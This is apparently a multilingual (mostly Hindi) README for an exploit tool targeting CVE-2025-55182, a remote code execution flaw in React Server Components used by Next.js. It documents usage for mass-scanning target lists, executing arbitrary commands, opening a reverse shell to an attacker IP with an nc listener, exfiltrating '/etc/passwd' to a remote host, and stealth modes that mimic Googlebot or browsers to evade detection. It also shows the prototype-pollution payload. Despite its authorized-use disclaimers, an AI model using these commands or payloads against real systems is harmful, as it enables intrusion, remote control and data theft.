
CVE-2025-55182 React Server Components दूरस्थ कोड निष्पादन शोषण उपकरण
CVE-2025-55182 एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता है, जो रिएक्ट सर्वर घटकों (RSC) में है और यह Next.js अनुप्रयोगों को प्रभावित करती है जो App Router और Server Actions का उपयोग करते हैं। यह भेद्यता Flight प्रोटोकॉल डिसीरियलाइज़ेशन प्रक्रिया में मौजूद है, जिससे हमलावर प्रोटोटाइप प्रदूषण (प्रोटोटाइप पोल्यूशन) के माध्यम से मनमाना कोड निष्पादन प्राप्त कर सकते हैं।
केवल अधिकृत सुरक्षा परीक्षण के लिए
यह उपकरण केवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस उपकरण का कोई भी अवैध या अनधिकृत उपयोग पूरी तरह से उपयोगकर्ता की जिम्मेदारी है। लेखक किसी भी प्रकार की कोई देयता स्वीकार नहीं करता।
本工具仅供授权安全测试和教育目的使用。如有任何违规、非法操作,一切后果由使用者自行承担,与本人无关。
कृपया इस उपकरण का उपयोग करने से पहले पूर्ण DISCLAIMER.md पढ़ें।
इस उपकरण का उपयोग करके, आप सहमत हैं कि:
| घटक | प्रभावित संस्करण |
|---|---|
react-server-dom-webpack | 19.0.0 - 19.2.0 |
| Next.js | 15.x, 16.x (App Router + Server Actions) |
# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp
# Install dependencies
pip install requests
pip install requests[socks] # For SOCKS5 proxy support
python3 exploit.py http://target:3000 --check
# Basic batch scan
python3 exploit.py -f targets.txt --check
# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2
# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt
python3 exploit.py http://target:3000 -c "id"
# Start listener first
nc -lvnp 4444
# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444
# Start listener
nc -lvnp 4444
# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080
| मोड | विवरण |
|---|---|
browser | वास्तविक ब्राउज़र अनुरोधों की नकल करता है (डिफ़ॉल्ट) |
crawler | खोज इंजन क्रॉलर (Googlebot, Baiduspider, आदि) की नकल करता है |
security | सुरक्षा स्कैनर User-Agents का उपयोग करता है |
| विकल्प | विवरण |
|---|---|
target | लक्ष्य URL (जैसे, http://localhost:3000) |
-f, --file | लक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक) |
-o, --output | कमजोर लक्ष्यों के लिए आउटपुट फ़ाइल |
-c, --command | निष्पादित करने के लिए कमांड (अंधा) |
--check | भेद्यता की जाँच करें |
--proxy | SOCKS5 प्रॉक्सी (जैसे, socks5://127.0.0.1:1080) |
--stealth | स्टील्थ मोड: browser, crawler, security |
--delay | अनुरोधों के बीच विलंब सेकंड में |
--variants | व्यापक जाँच के लिए कई पेलोड वेरिएंट का उपयोग करें |
--revshell IP PORT | IP:PORT पर रिवर्स शेल |
--exfil CMD IP PORT | CMD निष्पादित करें और आउटपुट को IP:PORT पर भेजें |
-t, --timeout | अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 15) |
यह एक्सप्लॉइट Flight प्रोटोकॉल डिसीरियलाइज़ेशन में प्रोटोटाइप प्रदूषण का लाभ उठाता है:
"$1:__proto__:then" के माध्यम से Object.prototype.then को प्रदूषित करता है"$1:constructor:constructor" के माध्यम से _formData.get को Function कंस्ट्रक्टर पर सेट करता है_prefix के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट करता है जो Function() को पास किया जाता है{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "<malicious_code>",
"_chunks": "$Q2",
"_formData": {"get": "$1:constructor:constructor"}
}
}
CVE-2025-55182-exp/
├── exploit.py # Main exploit script
├── targets.txt # Target URLs list (one per line)
└── README.md # This file
# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000
react-server-dom-webpack और Next.js के नवीनतम पैच संस्करणों मेंयह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
इस सॉफ़्टवेयर को डाउनलोड करके, कॉपी करके, इंस्टॉल करके या उपयोग करके, आप इस अस्वीकरण की शर्तों से बंधने के लिए सहमत होते हैं।
यह उपकरण विशेष रूप से के लिए डिज़ाइन किया गया है:
आप इस उपकरण का उपयोग नहीं करेंगे:
यह सॉफ़्टवेयर "बिना किसी वारंटी के" प्रदान किया जाता है, चाहे वह स्पष्ट हो या निहित। लेखक सभी वारंटियों को अस्वीकार करते हैं, जिनमें शामिल हैं लेकिन इन्हीं तक सीमित नहीं:
किसी भी स्थिति में लेखक किसी के लिए उत्तरदायी नहीं होंगे:
उपयोगकर्ता पूरी जिम्मेदारी मानता है:
इस उपकरण का उपयोग करके, आप स्वीकार करते हैं कि:
下载、复制、安装或使用本软件即表示您同意受本免责声明条款的约束。
本工具仅用于:
您不得将本工具用于:
本软件按"原样"提供,不提供任何明示或暗示的担保。作者否认所有担保,包括但不限于:
在任何情况下,作者均不对以下情况承担责任:
用户对以下事项承担全部责任:
使用本工具即表示您确认:
在进行任何安全测试之前,您必须:
Before conducting any security testing, you must:
⚠️ 未经授权的计算机访问是违法行为 ⚠️
⚠️ 未经授权的计算机访问是违法行为 ⚠️
⚠️ अनधिकृत कंप्यूटर पहुंच एक आपराधिक अपराध है ⚠️
⚠️ Unauthorized computer access is a criminal offense ⚠️